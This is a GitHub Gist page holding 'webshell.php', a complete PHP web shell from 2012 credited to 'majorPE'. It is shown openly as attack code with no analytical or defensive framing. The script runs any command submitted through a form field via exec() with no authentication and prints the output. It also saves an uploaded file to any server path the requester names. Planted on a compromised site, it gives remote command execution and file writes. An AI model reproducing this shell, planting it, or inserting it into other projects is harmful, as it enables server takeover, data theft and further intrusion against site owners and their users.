Created
November 20, 2022 15:23
-
-
Save ricardomaia/f57204019bf64715ed6b1f587a7428d7 to your computer and use it in GitHub Desktop.
webshell.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Project Name : PHP Web Shell --> | |
| <!-- Version : 0.01 --> | |
| <!-- First development date : 2012/07/31 --> | |
| <!-- This Version development date : 2012/07/31 --> | |
| <!-- language : html, css, javascript, php --> | |
| <!-- Developer : majorPE --> | |
| <!-- Web site : http://blog.naver.com/xornrbboy --> | |
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> | |
| <html> | |
| <head> | |
| <meta http-equiv="Content-Type" content="text/html" charset="euc-kr"> | |
| <title>PHP Web Shell Ver 0.01 by majorPE</title> | |
| <script type="text/javascript"> | |
| function FocusIn(obj) | |
| { | |
| if(obj.value == obj.defaultValue) | |
| obj.value = ''; | |
| } | |
| function FocusOut(obj) | |
| { | |
| if(obj.value == '') | |
| obj.value = obj.defaultValue; | |
| } | |
| </script> | |
| </head> | |
| <body> | |
| <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?></b><br><br> | |
| HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br> | |
| REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br> | |
| <br> | |
| <form name="cmd_exec" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> | |
| <input type="text" name="cmd" size="70" maxlength="500" value="Input command to execute" onfocus="FocusIn(document.cmd_exec.cmd)" onblur="FocusOut(document.cmd_exec.cmd)"> | |
| <input type="submit" name="exec" value="exec"> | |
| </form> | |
| <?php | |
| if(isset($_POST['exec'])) | |
| { | |
| exec($_POST['cmd'],$result); | |
| echo '----------------- < OutPut > -----------------'; | |
| echo '<pre>'; | |
| foreach($result as $print) | |
| { | |
| $print = str_replace('<','<',$print); | |
| echo $print . '<br>'; | |
| } | |
| echo '</pre>'; | |
| } | |
| else echo '<br>'; | |
| ?> | |
| <form enctype="multipart/form-data" name="file_upload" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> | |
| <input type="file" name="file"> | |
| <input type="submit" name="upload" value="upload"><br> | |
| <input type="text" name="target" size="100" value="Location where file will be uploaded (include file name!)" onfocus="FocusIn(document.file_upload.target)" onblur="FocusOut(document.file_upload.target)"> | |
| </form> | |
| <?php | |
| if(isset($_POST['upload'])) | |
| { | |
| $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']); | |
| if($check == TRUE) | |
| echo '<pre>The file was uploaded successfully!!</pre>'; | |
| else | |
| echo '<pre>File Upload was failed...</pre>'; | |
| } | |
| ?> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment